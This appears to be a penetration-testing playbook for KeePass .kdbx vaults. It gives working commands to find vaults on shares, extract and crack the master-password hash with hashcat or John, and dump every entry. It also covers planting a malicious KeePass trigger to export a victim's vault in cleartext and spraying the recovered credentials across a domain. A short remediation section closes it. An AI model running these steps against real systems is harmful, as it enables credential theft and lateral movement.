You found a KeePass database (.kdbx — often mistyped .kxdb/kxdb). This is the “what do I do now” playbook. KeePass vaults are jackpots: one cracked master password usually yields many reusable credentials.

🛡️ Methodology Checklist

  • Got the file off the box? → Route A: crack offline
  • Pulled it over FTP? Use binary mode (binary then get) — ASCII mode silently corrupts the .kdbx
  • Still on the host with admin, and a user actively uses KeePass? → Route B: live trigger
  • Extract hash: keepass2john [FILE].kdbx > kp.hash
  • Crack: hashcat -m 13400 kp.hash rockyou.txt (or john kp.hash) — first try a targeted list built from clues you found (Password_Cracking_Wordlists_Rules)
  • Open the vault with the master password → dump every entry (keepassxc-cli ls -R)
  • Classify each recovered cred by likely scope (domain user? SQL-local? app/service?) before testing
  • Spray/reuse the recovered creds across the domain (NetExec_SMB_Recon)
  • No crack? → hunt the master password elsewhere (Credential_Hunting_Windows)

🎯 Operational Context

Use when: You discover a .kdbx file (spidered from a share, found in a home dir, in a backup, dropped on an anonymous FTP). Find them with nxc smb [TARGET] -u [USER] -p [PASS] --spider C$ --pattern ".kdbx" or dir /s *.kdbx / find / -name '*.kdbx'. Transfer it correctly: Over FTP, switch to binary mode (binary/bin) before get — pulling a .kdbx in ASCII mode prints WARNING! bare linefeeds received in ASCII mode and quietly corrupts the file so it won’t parse/crack. Re-download in binary if you see that. Think Dumber First: Pull the file, run keepass2john → crack. KeePass master passwords are frequently weak/reused — this cracks more often than you’d expect. Try a targeted wordlist built from clues found on the box (audit notes, training docs, password policy) before a generic rockyou run; a 50-line list often cracks instantly. Skip when: You only have the .kdbx and the master password is strong — there’s no brute-force shortcut; pivot to finding the password (config, notes, reuse) instead.

⚡ Tactical Cheatsheet

CommandTactical Outcome
nxc smb [TARGET] -u [USER] -p [PASS] --spider C$ --pattern ".kdbx"Find .kdbx files on a share
keepass2john Shared.kdbx > kp.hashExtract the master-password hash
hashcat -m 13400 kp.hash /usr/share/wordlists/rockyou.txtCrack (KeePass hashcat mode)
john --wordlist=rockyou.txt kp.hashCrack with John (alternative)
keepassxc-cli open Shared.kdbxOpen the vault headless (prompts master pw)
keepassxc-cli ls -R Shared.kdbxList all entries recursively (vaults nest entries in groups)
keepassxc-cli show -s Shared.kdbx "[GROUP]/[ENTRY]"Show an entry with protected fields — use the full Group/Entry path
nxc smb [TARGET] -u [USER] -p [PASS] -M keepass_trigger -o ACTION=ALL KEEPASS_CONFIG_PATH="[XML]"Live cleartext export (admin on host)

🔬 Deep Dive & Workflow

Route A — Offline crack (you have the file)

The default play once the .kdbx is on your attacker box.

# 1. Extract the hash (keepass2john ships with John-jumbo)
keepass2john Shared.kdbx > kp.hash
#    → if "keepass2john: command not found", try /usr/share/john/keepass2john or the *.py variant
 
# 2. Crack — KeePass = hashcat mode 13400 (covers KDBX 3.x and 4.x)
#    BEST FIRST MOVE: a targeted list from clues on the box (see Wordlists_Rules note below)
john --wordlist=targeted.txt kp.hash
#    fall back to rockyou if that misses:
hashcat -m 13400 kp.hash /usr/share/wordlists/rockyou.txt
#    or: john --wordlist=/usr/share/wordlists/rockyou.txt kp.hash
#    show it:  hashcat -m 13400 kp.hash --show   |   john --show kp.hash
 
# 3. Open the vault with the recovered master password and dump everything
keepassxc-cli ls -R Shared.kdbx                       # recursive — see every group/entry
keepassxc-cli show -s Shared.kdbx "IT/SQL Guest Access"   # -s reveals protected fields; use the full Group/Entry path

Build a targeted list from box context first. Audit reports, training docs, and policy files often hand you the password pattern (e.g. a SeasonYear! policy → Autumn2024!). A tiny generated list cracks the vault near-instantly where rockyou would grind. Example: for s in Spring Summer Autumn Fall Winter; do for y in $(seq 2018 2025); do printf '%s%s\n%s%s!\n' "$s" "$y" "$s" "$y"; done; done > targeted.txt. More patterns/rules: Password_Cracking_Wordlists_Rules.

The keepassxc-cli prompt is not a shell. cd, dir, and ls <group> don’t navigate like a filesystem — groups are just path prefixes. Run keepassxc-cli ls -R and keepassxc-cli show -s "<Group>/<Entry>" from your normal terminal, not from inside an interactive open session. hashcat throws Salt-value exceptionNo hashes loaded? This is a well-known mode-13400 parser quirk on valid keepass2john output — and hashcat doesn’t strip the username: prefix (Shared: here). Easiest fix: use John, which parses its own tool’s output cleanly. For hashcat, drop the prefix first: sed 's/^[^:]*://' kp.hash > kp_clean.hash, then hashcat -m 13400 kp_clean.hash …. ($keepass$*2*<rounds>*0*… = AES-KDF, well within John’s reach.)

KDBX4 / Argon2: if cracking stalls or keepass2john chokes, you have a modern KDBX4 (Argon2 KDF). Use a recent hashcat/John build (Argon2 support), or keepass4brute. Argon2 is slow by design — keep the wordlist tight.

Route B — Live trigger (admin on the host, user actively uses KeePass)

No cracking needed: abuse a malicious KeePass trigger to export the DB in cleartext the next time the victim unlocks it. Full detail on NetExec_PostExploitation.

nxc smb [TARGET] -u [USER] -p [PASS] -M keepass_discover     # find DBs + the config XML
nxc smb [TARGET] -u [USER] -p [PASS] -M keepass_trigger \
  -o ACTION=ALL KEEPASS_CONFIG_PATH="[PATH_TO_KEEPASS_CONFIG_XML]"
# → wait for the victim to open KeePass, retrieve the exported cleartext, remove the trigger

After you’re in — this is the real win

A vault is rarely a single credential. Dump every entry, then reuse:

  • Classify before you test. Not every entry is a domain login — a SQLGuest-style entry is likely SQL-local auth (nxc mssql … --local-auth), an FTP/WEB01 entry is service-scoped, etc. Test each cred against the service it actually belongs to; an SMB failure doesn’t invalidate a SQL/app credential.
  • Validate/spray the domain-shaped creds domain-wide: nxc smb [DC]/24 -u [USER_FILE] -p [PASS_FILE] --continue-on-success (NetExec_SMB_Recon).
  • Watch for admin/service accounts, SSH keys, and notes fields (people paste recovery codes there).

🛠️ Troubleshooting & Edge Cases

ProblemCauseFix
hashcat: Salt-value exception / No hashes loadedmode-13400 parser quirk + the username: prefix on the lineUse John (john --wordlist=… kp.hash); for hashcat, strip the prefix: sed 's/^[^:]*://' kp.hash > kp_clean.hash
.kdbx won’t parse / keepass2john errors after an FTP pullDownloaded in ASCII mode (bare linefeeds warning) — file is corruptedRe-download in binary mode: binary (or bin) then get Shared.kdbx
John: Crash recovery file is locked: ~/.john/john.recA previous John run is still alive or left a stale sessionKill the old john process (or rm ~/.john/john.rec), then re-run
cd/dir/ls <group> do nothing in the CLIkeepassxc-cli interactive prompt isn’t a filesystem shellRun keepassxc-cli ls -R / show -s "<Group>/<Entry>" from your normal terminal
keepass2john not foundJohn-jumbo not installed/PATHsudo apt install john; or /usr/share/john/keepass2john
Hash extracts but won’t crackStrong/unique master passwordStop brute-forcing; hunt the password (reuse, config, notes) — Credential_Hunting_Windows
keepass2john errors on the fileKDBX4 (Argon2) on an old toolRecent John/hashcat, or keepass4brute
Cracked, but a key file is requiredVault uses password + keyfileYou also need the .key/.keyx file — hunt the same dirs/share
Cracking is extremely slowArgon2 KDF (by design)Tighten the wordlist; this is expected, not a bug

📝 Reporting Trigger

Finding Title: KeePass Vault with Weak Master Password Exposes Stored Credentials Impact: A recovered .kdbx database protected by a weak/guessable master password was cracked offline, disclosing all stored credentials — enabling lateral movement and privilege escalation through credential reuse. Root Cause: Weak KeePass master password; the vault stored in a location accessible to a lower-privileged user (open share, backup, home directory). Recommendation: Enforce a strong, unique KeePass master password (and a key file for high-value vaults); restrict access to vault files; avoid storing .kdbx on shared/world-readable locations; rotate any credentials exposed by this finding.

🔗 Related Nodes